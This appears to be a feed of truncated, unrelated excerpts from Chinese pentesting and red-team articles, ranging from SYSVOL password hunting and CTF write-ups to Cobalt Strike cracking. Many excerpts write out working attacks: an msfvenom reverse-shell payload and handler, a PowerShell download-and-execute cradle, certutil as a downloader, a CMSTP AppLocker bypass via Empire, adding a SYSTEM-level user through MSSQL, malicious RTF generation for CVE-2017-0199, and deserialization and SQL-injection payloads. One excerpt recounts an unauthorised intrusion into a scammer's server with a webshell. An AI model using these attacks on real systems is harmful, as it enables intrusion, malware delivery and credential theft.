红队攻击面相关讨论

这种方法是最简单的，因为不需要特殊的“黑客”工具。所有的攻击必须做的是打开Windows资源管理器，并搜索域名为SYSVOL DFS共享的XML文件。在大多数情况下，以下XML文件将包含凭据：groups.xml，scheduledtasks.xml和＆Services.xml，Printers.xml ，Drives.xml. SYSVOL是所有经过身份验证的用户具有读访问权限的Active Directory中的域范围共享 SYSVOL是指存储域公共文件服务器副本的共享文件夹，它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的，它用来存放GPO、Script等信息。同时，存放在Sysvol文件夹中的信息，会复制到域中所有DC上。 SYSVOL包含登录脚本，组策略数据以及需要在任何有域控制器的任何地方可用的其他域范围数据（因为SYSVOL在所有域控制器之间自动同步并共享）。所有域组策略都存储在这里：\\ <DOMAIN> \ SYSVOL \ <DOMAIN> \ Policies \ 注意：C:\Windows\SYSVOL目录下，只有创建组策略脚本登录才能有策略脚本配置文件groups.xml,默认是没有的 当创建新的GPP时，在SYSVOL中创建了一个与相关配置数据相关联的XML文件，如果提供了密码，那么AES-256位加密应该足够强的。 用于加密任何域中的所有组策略首选项密码的32字节AES密钥： https://msdn.microsoft.com/e…

初遇难题发现一个bQc站先尝试打一下主站先尝试目录扫描看能不能发现一些后台之类的，这里我用的是dirsearch。但是很遗憾，没有什么有价值的目录，连后台也扫不出来，但是这是在意料之中，毕竟大部分菠菜网站防护都做的挺好的。接下里尝试注册一个账号看看尝试注入，发现加密，不会逆向的我只能暂时放弃。注册成功后发现一个上传接口上传成功但是查看后发现他是以id的形式存储，无法形成上传漏洞放弃。这个网站拿不下来转换思路尝试对整个ip进行渗透，首先要对这个ip的全端口进行扫描，尽量获取到比较全的信息。获得了两个web页面。rocketmq，这个有最新版漏洞爆出来尝试找到工具尝试攻击，但是失败不能执行命令。还有另外一个登录界面发现存在shiro框架尝试爆破但是未发现秘钥。柳暗花明突破点：他有一个8888端口，访问都会跳转非法ip看了一下burp发现他会访问登录页面再进行跳转眉头一皱发现事情并不简单，在ip后随便加了一点，导致其报错，发现其使用的是spring框架。Actuator 是 Spring Boot 提供的用来对应用系统进行自省和监控的功能模块，借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。Actuator 的核心是端点 Endpoint，它用来监视应用程序及交互，spring-boot-actuator 中已经内置了非常多的 Endpoint（health、info、beans、metrics、httptrace、shutdown等等），同时也允许我们自己扩展自己的 Endpoints。每个 Endp…

前言本文仅用于交流学习， 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。 渗透测试可分为三个阶段 信息收集 尽可能的收集所有关的资产信息确定测试范围 漏洞发现 针对收集的资产进行进一步的漏洞检测 漏洞利用 针对发现的漏洞进行进一步的利用以及利用的程度 1.js中的api接口 2.多端口形站点3.客服系统钓鱼引导等4.积分系统针对脆弱的旁站5.充值接口6.找源代码分析某演示站泄露的源码白盒分析 7.bc后台根于js资源url,子域,等多种方式找一般小站大多是自域前加 ad ag admin 123admin ht等等 转载于原文链接： https://mp.weixin.qq.com/s/ZGNKIkfOidLPpjT856LHxw

0x00 漏洞背景 2020年10月14日，某监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞的风险通告，该漏洞是由于Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement（路由通告）数据包时存在漏洞，远程攻击者通过构造特制的ICMPv6 Router Advertisement（路由通告）数据包 ，并将其发送到远程Windows主机上，可造成远程BSOD，漏洞编号为CVE-2020-16898。 0x01 影响版本 操作系统版本版本补丁经过测试 Windows 10 X86 / x64 / ARM64 1709 ✔️ Windows 10 X86 / x64 / ARM64 1803 ✔️ Windows 10 X86 / x64 / ARM64 1809年 ✔️ Windows 10 X86 / x64 / ARM64 1903年 ✔️ Windows 10 X86 / x64 / ARM64 1909年 ✔️ Windows 10 X86 / x64 / ARM64 2004年 ✔️ Windows Server 2019 Windows Server 2019（服务器核心版） Windows Server 1903版（服务器核心版） Windows Server版本1909（服务器核心版） Windows Server 2004版（服务器核心版本） …

信息搜集 开源情报信息收集（OSINT） github Github_Nuggests（自动爬取Github上文件敏感信息泄露） :https://github.com/az0ne/Github_Nuggests GSIL（能够实现近实时（15分钟内）的发现Github上泄露的信息） :https://github.com/FeeiCN/GSIL x-patrol(小米团队的):https://github.com/MiSecurity/x-patrol whois查询/注册人反查/邮箱反查/相关资产 站长之家:http://whois.chinaz.com/?DomainName=target.com&ws= 爱站:https://whois.aizhan.com/target.com/ 微步在线:https://x.threatbook.cn/ IP反查:https://dns.aizhan.com/ 天眼查:https://www.tianyancha.com/ 虎妈查:http://www.whomx.com/ 历史漏洞查询 : 在线查询:http://wy.zone.ci/ 自搭建:https://github.com/hanc00l/wooyun_publi/ google hacking 创建企业密码字典 字典列表 passwordlist:https://github.com/lavalamp-/password-lists 猪猪侠字典:https://pan.baidu.com/s/1dF…

总则 首先这里的内网不包含网络拓扑规划、应用发布、访问控制的等基础网络规划的内容，对于身份鉴别模式和访问控制有推荐的场景模式。对于内网安全的管控还是回归风险评估三要素，从扫要素开始说起，更能体现管控工作的思路。 风险评估三要素： - 资产：这里包含所有的IT资产和无形资产（包含数据和名誉）； - 威胁：这里一般指的是面临的内部和外部可能的有害行为和力量； - 脆弱：这里多指漏洞以及存在的其他隐患； 资产 换了个角度来分析就看出来为什么内网安全第一步要做资产的收集整理归类，其实这一步恰恰也是最繁杂的。一般公司不会再初创伊始就注重安全，肯定是发展到了一定阶段才开始关注安全并建立自己的安全部门，除了紧急救火外，第一步要做的推进事项就是收集资产、分类资产、管控资产；特别要注明的是对不同的资产要执行不同的安全策略。类似OA、财务、域控等重要系统，它们或许有敏感数据，或许有内网权限集合，所以要格外特别保护，执行最严格的管理措施，但是对于测试虚拟化主机池，在做好隔离的情况下，不一定要执行一类的安全标准。 执行资产发现的技术方案： - 收集最原始的数据包括（IP、域名、URL等）； - 收集业务相关信息（资产归属和运维负责人、资产使用目的等）； - 使用以上数据对内网进行探测发现（masscan、nmap）发现活跃的Domain、IP、URL等，对于域名还要进行多种解析，求得子域名、A记录、CNAME等（DNS、PDNS）； - 所有等级资产入库，对于所有IP进行端口扫描…

0x00 概述 CobaltStrike是一款内网渗透的商业远控软件，支持自定义脚本扩展，功能非常强大。前段时间Github上有好心人放出了CobaltStrike3.12的试用版，接着Lz1y很快就放出了破解版，加上热心老哥提供了的xor64.bin（试用版中没有这个文件），一个比较完美的最新可用版本诞生了。下面我们看下最新试用版是如何被完美破解的。 0x02 上手 CobaltStrike（下面简称CS）主体代码是用Java开发的，逆起来比较友好。用jd-gui反编译cobaltstrike.jar文件，可以看到代码几乎没有做防破解。Java源码没有任何混淆。但是查看反编译的源码时，很多地方出现了// INTERNAL ERROR //，这里我推荐一款Java反编译工具luyten，几乎可以100%反编译获得cobaltstrike.jar源码。 CS的License处理逻辑在common/License.java文件中： package common; import aggressor.*; import javax.swing.*; import java.awt.*; public class License { private static long life; private static long today; private static long start; private static long difference; private static…

前提 房间地址：https://tryhackme.com/room/overpass 两个问题 实战 靶机地址：10.10.109.42 扫一下 开放了ssh 以及80 我们是肯定需要进ssh的 gobu扫一下 当然我们也能dirb or dirsearch扫一下 进入admin 我们查看源代码 当然从扫描结果来看 把login.js暴漏出来了 这说明他不一定是让我们爆破 而是想办法绕过这个js 让我们代码审计一下 学过js的都知道 Windows.location是跳转的意思 这里的意思就是携带cookie就跳转到admin 这是我之前写的PHP登录页面 期中我们用<script> </script>就是写一段js 其中就使用JS进行Window.location跳转 我们看一下cookie.js(好像没什么用) 原来那个我能看出来 这挤一块了(实际上在互联网上正常的JS也是挤一块的),第一个才是另类, 不过看着有点难受 我们通过浏览器给我们整理一下看看吧 没看出个什么东西 再次折反过来分析login.js 这里需要把cookie设计成status0RCookie进行访问就能跳转/admin 那么好我们去试试…

前言在内网渗透时，一个WebShell或CobaltStrike、Metasploit上线等，只是开端，更多是要内网横向移动，扩大战果，打到核心区域。但后渗透的前提是需要搭建一条通向内网的“专属通道”，才能进一步攻击。可实战中因为网络环境不同，所利用的方式就不同。 以下为自我总结“实战中内网穿透的打法”思维导图： 目标出网（socks代理）这是实战中最愿意碰到的网络环境，目标机可以正常访问互联网，可直接在目标机挂socks代理或CobaltStrike上线，打通目标的内网通道。 Frp（socks5） Frp服务端配置文件： 1 | [common] 2 | bind_port = 8080Frp客户端配置文件： 1 | [common] 2 | server_addr = xx.xx.xx.xx 3 | server_port = 8080 4 | #服务端口使用Web常见端口 5 | 6 | [socks5] 7 | type = tcp 8 | remote_port = 8088 9 | plugin = socks5 10 | use_encryption = true 11 | use_compression = true 12 | #socks5口令 13 | #plugin_user = SuperMan 14 | #plugin_passwd = XpO2McWe6nj3此处添加了加密压缩这两个功能，默认是不开启的，根据作者介绍，压缩算法使用的是 snappy。 use_encryption = true 启用加密…

今天朋友突然告诉我，某转买手机被骗了1200块钱，心理一惊，果然不出所料，那我来试试吧。 要来了诈骗网站地址，打开是这种： 果断收集一下信息：（由于留言骗子返还朋友钱款，暂时给他留点面子，打点马赛克） 查看端口，一猜就是宝塔面板搭建开着80，那就访问一下：从官网查找客服软件的教程。发现后台路径为：/admin直接访问果然发现：想也没想，直接admin：123456，没想到的是进去了哈哈哈：下一步当然是getshell，找了一圈发现直接可编辑语言配置文件：这里使用简单的一句话还给我封了ip丫的，看了一眼竟然用云盾，这骗子还有点安全意识，那只好祭出我的哥斯拉杀器（直接带bypass function的，也好用对不）：好家伙，禁用的函数如此之多，那行吧，绕过呗文件管理时发现限制目录读取： 直接使用哥斯拉的目录访问绕过： 最后目录浏览时发现php存在多个版本，本人php5提权不太熟悉(哥斯拉不适用哈哈)，看见php7后果断找其他站点：访问其他站点都能访问，解析ip都是这个，终于发现一个php7的 终于发现一个php7的，但是linux版本内核很新啊，看来提权是个麻烦 而后不出所料，哥斯拉的函数绕过可执行命令：执行后直接获取低权限shell： 是www用户，权限很低。 在目录下还发现了一个杀猪盘工具：框框 可以一键生成诈骗详情链接： （现在大家知道不要相信qq微信交易的重要性了吧，这种杀猪盘很容易坑人） 最后根据收集到的数据库链接等信息准备进数据库里看一眼，哥斯拉的链接有问题： 于是搭建frp到骗子服务器访问： 信息： 由…

逛QQ空间刷到了 于是有了下文。打开站点，很贴心，前台后台都可以进。 下面说漏洞点 sql注入，有一套程序基于某个模板二开，正好我手里有这套模板且审计过。所以轻松拿下。 无任何过滤，直接注即可。 任意文件上传 这个我怀疑是开发自己留的后门。 看得懂的人一眼就看出来了。直接本地新建表单提交即可。 但是目标站有个问题，上传不回显路径，应该是注释了echo。本地搭建测试， 上传文件名修改为这个格式。 思路：本地复现upload，然后和远程同时提交，同一个时间点，返回的文件名应该是一样的。 测试: 复现成功。 点到为止。 另求教各位精通php审计的大佬 这段代码可否有利用点。 尝试各种截断始终无法执行php代码。 转载于原文链接： https://mp.weixin.qq.com/s/hduQd7Jm72b00oSU9Ip1BQ

一、flag的提交格式flag{th1s_!s_a_d4m0_4la9}二、PDF隐写writeup:使用在线word转pdf工具，转成word文件，然后拖动就可以查看到flaghttps://app.xunjiepdf.com/pdf2word/ 三、GIF图片隐写一writeup: 1.使用Stegsolve工具的Frame Browser浏览器查看静态的图片 File Format: 文件格式，这个主要是查看图片的具体信息 Data Extract: 数据抽取，图片中隐藏数据的抽取 Frame Browser: 帧浏览器，主要是对GIF之类的动图进行分解，动图变成一张张图片，便于查看 Image Combiner: 拼图，图片拼接 2.二维码缺少三个小方块，而这些小方块被称为定位图案，用于标记二维码矩形的大小，用三个定位图案可以标识并确定一个二维码矩形的位置和方向。3.将静态图片截图保存下，使用phoshtop工具修复二维码图片，然后进行扫描 https://jiema.wwei.cn/（二维码在线识别工具） 四、jar隐写writeup: 1.用 jd-gui 打开，直接搜索：flag 2.通过base64解密得到flag{DajiDali_JinwanChiji}五、压缩包隐写之黑白图片writeup:1.用winhex查看这些图片，没有发现可利用信息，于是想到黑白可能代表二进制0和1。我们将白色视为0黑色视为1或者反过来尝试一遍。一共有104张图片正好是8的倍数，可以转为8个一对二进制，再转化为ASCII码。由于图片较多，我们…

0x00 什么是红队 红队，一般是指网络实战攻防演习中的攻击一方。 红队一般会针对目标系统、人员、软件、硬件和设备同时执行的多角度、混合、对抗性的模拟攻击；通过实现系统提权、控制业务、获取数据等目标，来发现系统、技术、人员和基础架构中存在的网络安全隐患或薄弱环节。 红队人员并不是一般意义上的电脑黑客。因为黑客往往以攻破系统，获取利益为目标；而红队则是以发现系统薄弱环节，提升系统安全性为目标。此外，对于一般的黑客来说，只要发现某一种攻击方法可以有效地达成目标，通常就没有必要再去尝试其他的攻击方法和途径；但红队的目标则是要尽可能地找出系统中存在的所有安全问题，因此往往会穷尽已知的“所有”方法来完成攻击。换句话说，红队人员需要的是全面的攻防能力，而不仅仅是一两招很牛的黑客技术。 红队的工作也与业界熟知的渗透测试有所区别。渗透测试通常是按照规范技术流程对目标系统进行的安全性测试；而红队攻击一般只限定攻击范围和攻击时段，对具体的攻击方法则没有太多限制。渗透测试过程一般只要验证漏洞的存在即可，而红队攻击则要求实际获取系统权限或系统数据。此外，渗透测试一般都会明确要求禁止使用社工手段（通过对人的诱导、欺骗等方法完成攻击），而红队则可以在一定范围内使用社工手段。 还有一点必须说明:虽然实战攻防演习过程中通常不会严格限定红队的攻击手法，但所有技术的使用，目标的达成，也必须严格遵守国家相关的法律和法规。 在演习实践中，红队通常会以3人为一个战斗小组，1人为组长。组长通常是红队中综合能力最强的人，需要较强的组织意识、应变能力和丰富的实战经验。而2名组…

前言 后期在打打CTFshow的靶场温习一下 Foreign friends please use Google Translate plugin to translate this article for better viewing 房间简介 在这个房间中，您将了解什么是SSRF、它们可以产生什么样的影响、您将查看一些 SSRF 攻击示例、如何发现 SSRF 漏洞、如何规避输入规则，然后我们为您提供了练习反对尝试你新发现的技能。 什么是 SSRF？ SSRF代表服务器端请求伪造。该漏洞允许恶意用户导致网络服务器向攻击者选择的资源发出额外的或经过编辑的 HTTP 请求。 SSRF的类型 SSRF漏洞有两种类型：第一个是常规 SSRF，其中数据返回到攻击者的屏幕。第二个是盲目 SSRF 漏洞，即发生 SSRF，但不会将任何信息返回到攻击者的屏幕。 有什么影响？ 成功的SSRF攻击可能会导致以下任一情况： 进入未经授权的区域。 访问客户/组织数据。 能够扩展到内部网络。 显示身份验证令牌/凭据。 room:https://tryhackme.com/room/ssrfqi 笔记 SSRF示例 寻找SSRF SSRF防御 SSRF实用 如tryhackme所说 将其他的照片改为私有 继续看tr…

前言 Web89 intval取整数 就跟python中的int一样 这里是只要有0-9就输出nonono 但是还需要是传出去是整数 所以我们用数组绕过 Web90 intval($var,$base)，其中var必填，base可选，这里base=0,则表示根据var开始的数字决定使用的进制： 0x或0X开头使用十六进制，0开头使用八进制，否则使用十进制。 这里是0开头 说明是根据开始的数字决定使用的进制 这里用的是八进制十六进制绕过 加0是告诉服务器这是八进制 如果转换成十六进制需要加0x Web91 不想打字了,感觉WP里给的说的好全面 i忽略大小写 m多行模式 我们只要让我们的参数里含有php即可 payload:cmd?=111%0aphp 或者cmd?=php%0aggg Web92 这里与web90的不同之处就在于等号了 ===表示类型和数值必须相等 ==是值相等就可以类型不一定相等 我们知道强制转换如果是小数部分的话会舍弃小数部分直接构造小数 Web93 不解释直接秒 Web94 查一下strpos用法 这里说明我们得含有0 但不能在开头,因为开头告诉服务器使用几进制 Web95 过滤了.八进制起手 +或者空格绕过最后一个限制 W…

1.powershell网络钓鱼脚本： https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1 2.MSF下生产一个后门文件，通过上传或者其他方式让其受害者点击 Msfvenom -p windows/meterpreter/reverse_https lhost = 192.168.1.138 lport = 4444 -f exe> /opt/bk.exe 2.通过MSF获取远程目标受害者主机的反弹shhell: msf> use multi/handler msf exploit（handler ）> set payload windows/meterpreter/reverse_https msf exploit（handler ）> set lhost 192.168.1.138 msf exploit（handler ）> set lport 4444 msf exploit（handler ）> exploit 3.powershel远程下载并执行： powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/enigma0x3/Invoke-LoginProm…

0x01 ipc$的定义 IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 0x02 ipc$与空连接,139,445端口,默认共享的关系 ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟). ipc$与139,445端口: ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭…

0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞 util ,最后好像没用到 检查程序，发现apache的common−collections4,而且其反序列化利用类未被Patch 一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打 考点发现就是 cc4 附上文章 外加spring−ech 网上有现成的 poc 造轮子！ : package moe.orangemc; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import javassist.ClassPool; import javassist.CtClass; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.…

默认情况下，AppLocker允许在文件夹中执行二进制文件，这是可以绕过它的主要原因。已经发现，这样的二进制文件可以很容易地用于绕过AppLocker和UAC。与Microsoft相关的二进制文件之一是CMSTP。CMSTP welcomes INF文件，因此通过INF进行开发是可能的。因此，我们将学习如何进行此类开发。 众所周知，CMSTP接受SCT文件，然后无提示地运行，因此我们将创建一个恶意的SCT文件以实现我们的目标。为此，我们将使用Empire PowerShell。有关Empire PowerShell的详细指南，请单击此处。 从Kali终端启动Empire框架，然后输入以下命令以创建恶意软件： listeners uselistener http set Host 192.168.1.109 execute 上面的命令将为您创建一个侦听器，然后键入back以从侦听器接口返回，并且创建SCT文件类型： usestager windows/launcher_sct set Listener HTTP execute 运行上述漏洞将创建SCT文件。我们将使用以下脚本在PowerShell中执行文件。在此脚本中，给出SCT文件的路径，并添加以下代码，如图所示： 从这里下载此脚本： ;cmstp.exe /s cmstp.inf [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall_SingleUser] UnRegister…

certutil在渗透测测试中的使用技巧 0x01 前言 最近在Casey Smith‏ @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验，介绍certutil在渗透测试中的应用，对cmd下downloader的实现方法作补充。 0x02 certutil简介 用于备份证书服务管理,支持xp-win10 更多操作说明见https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx 0x03 渗透测试中的应用 1、downloader (1) 保存在当前路径，文件名称和下载文件名称相同 certutil -urlcache -split -f https://github.com/backlion/demo/blob/master/weblogic.py (2) 保存在当前路径，指定保存文件名称 certutil -urlcache -split -f https://github.com/backlion/demo/blob/master/weblogic.py test.py (3) 保存在缓存目录，名称随机 缓存目录位置： %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content certutil …

0x00 前言 在本文中，我们将处理一个很长时间以来一直待解决的问题：MSSQL Rootkit。到目前为止，针对MS-SQL所描述的大多数命令执行都是调用“ xp_cmdshell ”和“ sp_OACreate ”存储过程的。因此，如果在没有xp_cmdshell和sp_OACreate存储过程的MSSQL服务器上拥有“ sa ”帐户或任何具有“ sysadmin ”权限的用户帐户，我们是否将停止渗透该系统? 当然，我们不应该放弃。在本文中将介绍如何获取具"xp_cmdshell”，“ sp_OACreate”，“ sp_OAMethod”的sysadmin权限的帐户. WarSQLKit Github: https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit 此工具用于捕获具有“系统管理员权限”和“ xp_cmdshell”，“ sp_OACreate”，“ sp_OAMethod”等权限的帐户。 WarSQLKit命令示例： EXEC sp_cmdExec 'whoami'; => Any Windows command EXEC sp_cmdExec 'whoami /RunSystemPriv'; => Any Windows command with NT AUTHORITY\SYSTEM rights EXEC sp_cmdExec '"net user eyup P@ssw0rd1 /add" /RunSystemPriv…

前言 细讲SQL注入 [SWPUCTF 2021 新生赛]sql 既让sqlmap工具跑不出来,又让手注不是很难,题出的很用心 地址:[SWPUCTF 2021 新生赛]sql | NSSCTF 用到的知识 确定注入参数 字符型 判断闭合符号 如上是单引号 判断回显位置 发现waf 空格被过滤 –+被过滤 绕空格过滤的方法 %09,/**/ 绕过–+注释符的方法: %23(#) 查询回显位置 ?wllm=1'order%09by%092%23 ?wllm=1'order/**/by/**/3%23 两个回显位置 判断列数 1'order/**/by/**/3%23 发现3列正常回显 4列报错 使用select一样的效果 说明一共有三列 查询数据库 -1'union/**/select/**/1,database(),3%23 数据库为test_db 查询表名 这里的前置知识在mysql里information_schema里包含了所有的数据名表名列名 其中information_schema.tables里包含了所有的表 group_concat…

0x00 写在故事之前 身一位渗透测试人员，比起 Client Side 的弱点，我更喜欢 Server Side 的攻击，能够直接控制服务器并获得权限操作 SHELL 才爽 。 当然一次完美的渗透出现任何形式的弱点都不可小视，在实际渗透时偶尔还是需要些 Client Side 弱点组合可以更完美的控制服务器，但是在寻找弱点时我本身还是先偏向于以可直接进入服务器的方式去寻找风险高、能长驱直入的弱点。随著 Facebook 在世界上越来越火、用户数量越来越多，一直以来都有想要尝试渗透目标的想法，恰好 Facebook 在 2012 年开始有了 Bug Bounty 奖金猎人的机制让我更加有兴趣渗透。 一般如由渗透的角度来说习惯性都会从收集资料、探测开始，首先界定出目标在网路上的 “范围” 有多大，姑且可以评估一下从何处比较有机会下手。例如: Google Hacking 能得到什么资料? 有几个 B 段的 IP ? C 段的 IP ? Whois? Reverse Whois? 有什么域名? 内部使用的域名? 接著做子域名的猜测、扫描 公司平常爱用什么样技术、设备? 在 Github, Pastebin 上是否有泄露的信息? …etc 当然 Bug Bounty 并不是让你无限制的攻击，将所遇到的范围与 Bug Bounty 所允许的范围做交集后才是你真正可以去尝试的目标。 一般来说大公司在渗透中比较容易出现的问题点这里例举几个例子来探讨： 对多数大公司而言，”网路边界” 是比较难顾及、容易出现问题的一块，当…

最近挖了一些漏洞。虽然重复了，但是有参考价值。这边给大家分享下。　　漏洞重复还是很难受的，转念一想，人生从不是事事如人意的，漏洞重复忽略，不代表失败。先来后到很重要，出场顺序很重要。 　　1.某站rce 忽略理由:不在范围内 作者神父&me 感谢神父带我 　　测试域名:https://***.***:8089/ 　　同时存在CVE-2017-11357 CVE-2019-18935 CVE-2017-9248漏洞 　　漏洞利用exp下载地址: 　　https://github.com/noperator/CVE-2019-18935 　　https://github.com/noperator/CVE-2019-18935.git 　　延迟11s:sleep 11s: 　　测试代码: test.c 　　 #include <windows.h> #include <stdio.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { if (fdwReason == DLL_PROCESS_ATTACH) //Sleep(10000); // Time interval in milliseconds. Sleep(11000); return TRUE; } test.c编译成amd642.dll文件 运行: python CVE-2019-18…

Microsoft Word下的恶意RTF文件容易被收到攻击，在本文中，我们使用python脚本对Microsoft Word 2013进行oday攻击演示，该脚本会生成恶意的.rtf文件，并提供目标系统的篡改会话。 利用工具包CVE-2017-0199 - v2.0是一个很有用的python利用脚本，它提供了一种快速有效的利用Microsoft RTF RCE进行攻击的方式。它可以生成恶意的RTF文件，并将metasploit 下meterpreter反弹shell有效载荷提供给攻击者，而不需要任何复杂的配置。 测试环境： 攻击者：Kali Linux（ip:192.168.1.24） 目标：Windows 10（ Microsoft Word 2013 ） 1.打开您的kali Linux的shell终端，然后输入以下命令生成一个恶意rtf： git clone https://github.com/bhdresh/CVE-2017-0199.git 此命令将运行一个python脚本来生成富文本格式的有效载荷，其中-M用于生成rtf文件,-w用于生成rtf文件的名称，即sales.rtf， -u为攻击者的IP地址或域名。 cd CVE-2017-0199 python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.24/raj.doc 以下截图中的命令输出生成的恶意.rtf文件即sales.rtf文件可以在系统中找到。…